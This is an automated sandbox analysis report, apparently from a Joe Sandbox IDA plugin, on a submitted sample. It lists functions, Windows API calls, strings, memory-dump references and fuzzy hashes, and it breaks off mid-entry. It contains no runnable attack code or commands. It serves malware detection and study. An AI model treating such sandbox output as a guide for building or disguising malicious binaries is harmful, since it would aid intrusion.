Opcode Fuzzy Hash: b427dafd1acb379182f38fa8176ccd6434b75c2a14c11954dee0b798d33d5e22
Instruction Fuzzy Hash: B331D371E04218EFDB25EF99DC8599EBBFCEB85350F504266F80497281DB78AE80CB51

Function 006E7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E7579

Part of subcall function 006E3B3D: __EH_prolog.LIBCMT ref: 006E3B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 006E7640

Part of subcall function 006E7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 006E7C04
Part of subcall function 006E7BF5: GetLastError.KERNEL32 ref: 006E7C4A
Part of subcall function 006E7BF5: CloseHandle.KERNEL32(?), ref: 006E7C59

Strings

SeSecurityPrivilege, xrefs: 006E75BE
SeRestorePrivilege, xrefs: 006E75D3

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 23f4ff8532952a13af159ef9723d315987ef414494f4a98fc22366b808f687b0
Instruction ID: 55b962a8cc3c906cb7192bb14fa2380fada55ff80d1957650c60dca9dd1072a1
Opcode Fuzzy Hash: 23f4ff8532952a13af159ef9723d315987ef414494f4a98fc22366b808f687b0
Instruction Fuzzy Hash: D9310471909388AFEF60EB69DC05BFE7BBAAF15344F004059F404A7292CB744A45CBA4

Function 006FA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

EndDialog.USER32(?,00000001), ref: 006FA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 006FA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 006FA4E2

Strings

ASKNEXTVOL, xrefs: 006FA448

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 958f0b5b595e5dc4968bb0a2d774df68dbf24252ffe5c9abfd93fe8b470c4c80
Instruction ID: 2add3e322c63510e6273c181c5f605137bb349a6cd14e93cfedde0e32593027c
Opcode Fuzzy Hash: 958f0b5b595e5dc4968bb0a2d774df68dbf24252ffe5c9abfd93fe8b470c4c80
Instruction Fuzzy Hash: 8411B472244244AFD721CFD8EC89FB637EAAB4B740F104105F3049A1B1C7A55902D77A

Function 006ED1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 006ED22E
_strncpy.LIBCMT ref: 006ED278

Strings

$%s, xrefs: 006ED223
@%s, xrefs: 006ED218

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 770618351f540499cace25477805c1493fd9279d341dcbe919ce37942608931b
Instruction ID: 210987795389e053ba79da8dbdd87577d66212dd846f2c147dcbc8ca9e61ae63
Opcode Fuzzy Hash: 770618351f540499cace25477805c1493fd9279d341dcbe919ce37942608931b
Instruction Fuzzy Hash: CD218E72441388EEDF20DEA9CD06FEE7BA9AF05300F040516FF149A291E375EA559F51

Function 006EB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006EB51E

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

_wcschr.LIBVCRUNTIME ref: 006EB53C
_wcschr.LIBVCRUNTIME ref: 006EB54C

Strings

%c:\, xrefs: 006EB514

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 1b5472e927eae9486275d72fe8c3e7b76c9fd99f91b271b9bb1b36add026aea7
Instruction ID: eea16063a877e1d6eb624f6c78d1e59fe927ce5839cf9da8f70224db8aba87c1
Opcode Fuzzy Hash: 1b5472e927eae9486275d72fe8c3e7b76c9fd99f91b271b9bb1b36add026aea7
Instruction Fuzzy Hash: 49016863902361FACB20AFB69C86CABB7EDDE953A0750951AF844C71C1FB34D850C2B1

Function 006F06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,006EABC5,00000008,?,00000000,?,006ECB88,?,00000000), ref: 006F06F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,006EABC5,00000008,?,00000000,?,006ECB88,?,00000000), ref: 006F06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,006EABC5,00000008,?,00000000,?,006ECB88,?,00000000), ref: 006F070D

Strings

Thread pool initialization failed., xrefs: 006F0725

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 87daa74a2c2bd65a11d15565ed62e34744cd79a63502dc3ad85350c332f806bc
Instruction ID: 7d985d9de78350da9185fadacb036afb238271c684aa7c96a9474d60e3cfc035
Opcode Fuzzy Hash: 87daa74a2c2bd65a11d15565ed62e34744cd79a63502dc3ad85350c332f806bc
Instruction Fuzzy Hash: 5611A3B1505708AFD3205F6ADC84AE7FBEDEB58754F10882EF2DA82241D6716A80CB54

Function 006FD38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 006FD3DE
REPLACEFILEDLG, xrefs: 006FD3C9, 006FD3FD

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 1e8f4a7ec4a5726bb58da9cc087415c2b7a63a5df4cd61a220d61559909dcf0b
Instruction ID: cbad86b24b58a51cbf0a972773c7c3fdf3164a07ed4936a74a5f91171b84f703
Opcode Fuzzy Hash: 1e8f4a7ec4a5726bb58da9cc087415c2b7a63a5df4cd61a220d61559909dcf0b
Instruction Fuzzy Hash: F601B97250025D6FD761AF54ED04AB63FDBE715340B048421F60592271C779AC51EBA5

Function 007091DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00709269
__alldvrm.LIBCMT ref: 0070946A
__alldvrm.LIBCMT ref: 0070948C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: 318466d2c146f1833d811995a2b2c0bb9cd23330225c83d671f522319ab2d155
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: A8A12372A04386DFDB21CE68C8917AEFBE5EF55350F18426DE6859B2C3C23C9942CB50

Function 006EA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,006E80B7,?,?,?), ref: 006EA351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,006E80B7,?,?), ref: 006EA395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,006E80B7,?,?,?,?,?,?,?,?), ref: 006EA416
CloseHandle.KERNEL32(?,?,00000000,?,006E80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 006EA41D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 93a633afc1e48be4f6a3bed1be00baeba6809bdea6e06a956cb5cc59a3062a59
Instruction ID: 1011ce64870b4df3bf35e1ec268593fa96936e0778f01619acb97d17ea922c0b
Opcode Fuzzy Hash: 93a633afc1e48be4f6a3bed1be00baeba6809bdea6e06a956cb5cc59a3062a59
Instruction Fuzzy Hash: 0D41CE312493C4AAE721DFA5CC45BEEBBE6AF85700F14491DF5D0E32C1D668AA48DB13

Function 0070C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007089AD,?,00000000,?,00000001,?,?,00000001,007089AD,?), ref: 0070C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007067E2,?), ref: 0070C181
__freea.LIBCMT ref: 0070C18A

Part of subcall function 00708518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0070C13D,00000000,?,007067E2,?,00000008,?,007089AD,?,?,?), ref: 0070854A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 944e4b297dc3eed326c213973d6edb51f9f8a7fbc5043c015f99150cd72da66d
Instruction ID: f19ada88a808da3883268ee6dd14b2935380c9739e8221fd5448dff42a094aa5
Opcode Fuzzy Hash: 944e4b297dc3eed326c213973d6edb51f9f8a7fbc5043c015f99150cd72da66d
Instruction Fuzzy Hash: FB319FB2A0020AEBDB259F68DC45DAE7BA5EB44710F144329FC049B291E739CD55CBA0

Function 006F9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006F9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 006F9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006F9DDB
ReleaseDC.USER32(00000000,00000000), ref: 006F9DE9

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b1ba139dc2ce687dd6047cd2fe2aa74bae48a4f38836a80d6ab84b305535f3b1
Instruction ID: e4dde0e441eb503ba4674d5716d3257a795eeb760f56e30b7148e5fee229f006
Opcode Fuzzy Hash: b1ba139dc2ce687dd6047cd2fe2aa74bae48a4f38836a80d6ab84b305535f3b1
Instruction Fuzzy Hash: 98E08C35982A21A7D3606FA0AC0CB8B3B94AB0A712F068002F701961A4DBB84442CBA9

Function 00702016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00702016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0070201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00702020

Part of subcall function 0070310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0070311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00702035

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: f64d32f8270da74092393e2811020e1b1f329bd944b692701f2c8b47441b7827
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: A5C00236004B48D4EC113BB1620E1BD47C80C667C4B9227C3A8805B1C39E4E060F9172

Function 006F9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006F9DF1: GetDC.USER32(00000000), ref: 006F9DF5
Part of subcall function 006F9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 006F9E00
Part of subcall function 006F9DF1: ReleaseDC.USER32(00000000,00000000), ref: 006F9E0B

GetObjectW.GDI32(?,00000018,?), ref: 006F9F8D

Part of subcall function 006FA1E5: GetDC.USER32(00000000), ref: 006FA1EE
Part of subcall function 006FA1E5: GetObjectW.GDI32(?,00000018,?), ref: 006FA21D
Part of subcall function 006FA1E5: ReleaseDC.USER32(00000000,?), ref: 006FA2B5

Strings

(, xrefs: 006FA0A3

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 5850a32e3869cdaa512e5da3ec247dd5b86d048a06bce1022cc91bb56ea645bd
Instruction ID: 48832c4eaf42a3659caa25fa7a2d093d41390c69e2f96c3ec50065d7e306eaf9
Opcode Fuzzy Hash: 5850a32e3869cdaa512e5da3ec247dd5b86d048a06bce1022cc91bb56ea645bd
Instruction Fuzzy Hash: 238115B52082189FC714DF68D84496ABBFAFFC8704F00891DF98AD7260CB35AD05CB66

Function 006F0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006F0FF1

Strings

%s: %s, xrefs: 006F1000
%ls, xrefs: 006F0E76, 006F0E8C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8677a8e93eb30bf59ef33559b6dce49f9b22a7f8aaddeb4243c36e99bd777ef5
Instruction ID: e426c2ea9f98974789f9f6067c8b28846c8bbea8b9bc4e5fdd1e743adabbad09
Opcode Fuzzy Hash: 8677a8e93eb30bf59ef33559b6dce49f9b22a7f8aaddeb4243c36e99bd777ef5
Instruction Fuzzy Hash: EB51E93128D74CFEFB301AA4CD12F367667AB05B00F20490AF7DA784D7CE925492AB16

Function 0070A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0070AA84

Part of subcall function 00708849: IsProcessorFeaturePresent.KERNEL32(00000017,00708838,00000050,00713958,?,006ECFE0,00000004,00720EE8,?,?,00708845,00000000,00000000,00000000,00000000,00000000), ref: 0070884B
Part of subcall function 00708849: GetCurrentProcess.KERNEL32(C0000417,00713958,00000050,00720EE8), ref: 0070886D
Part of subcall function 00708849: TerminateProcess.KERNEL32(00000000), ref: 00708874

Strings

., xrefs: 0070AC3B
*?, xrefs: 0070A95B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 6e40b37078fa1f49416ab144bd3ced95f190882b601cd1396546f899b3f5047d
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: B2519371E0021AEFDF14DFA8C981AADB7F5EF58310F258269E454E7380E639AE01CB51

Function 006E772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E7730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006E78CC

Part of subcall function 006EA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,006EA27A,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA458
Part of subcall function 006EA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,006EA27A,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA489

Strings

:, xrefs: 006E77A1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 43c452c907684456e5b8cdcffce4f7cb8a5afc5018566d8def147e0bc7bf3991
Instruction ID: e2f564c5f6c4a778db289f71ef57fa361ba76602d7c1dea1bc00c340b46849ad
Opcode Fuzzy Hash: 43c452c907684456e5b8cdcffce4f7cb8a5afc5018566d8def147e0bc7bf3991
Instruction Fuzzy Hash: FF41A571802398AAEB64EB51CD45EEE737E9F41300F0040EEB609A3192DB745F84CF65

Function 006EB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 006EB6BE, 006EB6FA, 006EB75B, 006EB7AE
UNC, xrefs: 006EB708

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: UNC$\\?\
